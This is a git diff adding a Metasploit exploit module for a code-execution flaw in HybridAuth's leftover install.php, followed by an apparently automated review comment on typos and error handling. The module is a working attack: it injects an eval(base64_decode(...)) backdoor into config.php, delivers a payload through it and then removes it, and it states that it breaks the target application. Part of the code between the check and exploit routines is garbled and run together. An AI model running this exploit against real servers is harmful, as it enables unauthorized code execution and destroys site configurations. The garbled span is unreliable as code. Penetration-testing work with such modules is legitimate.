diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
new file mode 100644
index 0000000000..b72979dd10
--- /dev/null
+++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ManualRanking # application config.php is overwritten
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HybridAuth install.php PHP Code Execution',
+ 'Description' => %q{
+ This module exploits a PHP code execution vulnerability in
+ HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
+ is not removed after installation allowing unauthenticated users to
+ write PHP code to the application configuration file 'config.php'.
+
+ Note: This exploit will overwrite the application configuration file
+ rendering the application unusable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Pichaya Morimoto', # Discovery and PoC
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'References' =>
+ [
+ ['EDB', '34273'],
+ ['OSVDB','109838']
+ ],
+ 'Arch' => ARCH_PHP,
+ 'Platform' => 'php',
+ 'Targets' =>
+ [
+ # Tested:
+ # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
+ ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Aug 4 2014',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
+ ], self.class)
+ end
+
+
+ #
+ # Check:
+ # * install.php exists
+ # * config.php is writable
+ # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
+ #
+ def check
+ res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
+ if !res
+ vprint_error "#{peer} - Connection failed"
+ return Exploit::CheckCode::Unknown
+ elsif res.code == 404
+ vprint_error "#{peer} - Could not find install.php"
+ elsif res.body =~ />([^<]+)<\/span> must be WRITABLEHybridAuth (2\.[012]\.[\d\.]+(-dev)?) 
InstallerHybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'install.php'),
+ 'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
+ )
+ if !res
+ fail_with Failure::Unknown, "#{peer} - Connection failed"
+ elsif res.body =~ /Installation completed/
+ print_good "#{peer} - Wrote backdoor successfully"
+ else
+ fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
+ end
+
+ # execute payload
+ code = Rex::Text.encode_base64(payload.encoded)
+ print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'config.php'),
+ 'data' => "#{payload_param}=#{code}"
+ }, 5)
+ if !res
+ print_warning "#{peer} - No response"
+ elsif res.code == 404
+ fail_with Failure::NotFound, "#{peer} - Could not find config.php"
+ elsif res.code == 200 || res.code == 500
+ print_good "#{peer} - Sent payload successfully"
+ end
+
+ # remove backdoor
+ print_status "#{peer} - Removing backdoor from config.php"
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'install.php'),
+ 'data' => 'OPENID_ADAPTER_STATUS='
+ )
+ if !res
+ print_error "#{peer} - Connection failed"
+ elsif res.body =~ /Installation completed/
+ print_good "#{peer} - Removed backdoor successfully"
+ else
+ print_warning "#{peer} - Could not remove payload from config.php"
+ end
+ end
+end
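Review bot: The payload-delivery branch in `exploit` silently drops any response whose status is not 404, 200 or 500, because the `if !res … elsif … elsif` chain after the `send_request_cgi({ … }, 5)` call has no `else`; a closing `else` with `print_warning "#{peer} - Unexpected reply (#{res.code})"` would keep this block consistent with the other two request blocks, which always report an outcome. The message on the `Failure::UnexpectedReply` line has a typo, `Coud not write` → `Could not write`, and the `Failure::Unknown` raised for a failed connection is conventionally `Failure::Unreachable` in this framework. The `['OSVDB','109838']` entry lacks the space after the comma its sibling uses, and the header comment URL `http//metasploit.com/download` is missing its colon. The tail of `check` and the opening of `exploit` are not legible in this hunk, so those lines are not reviewed.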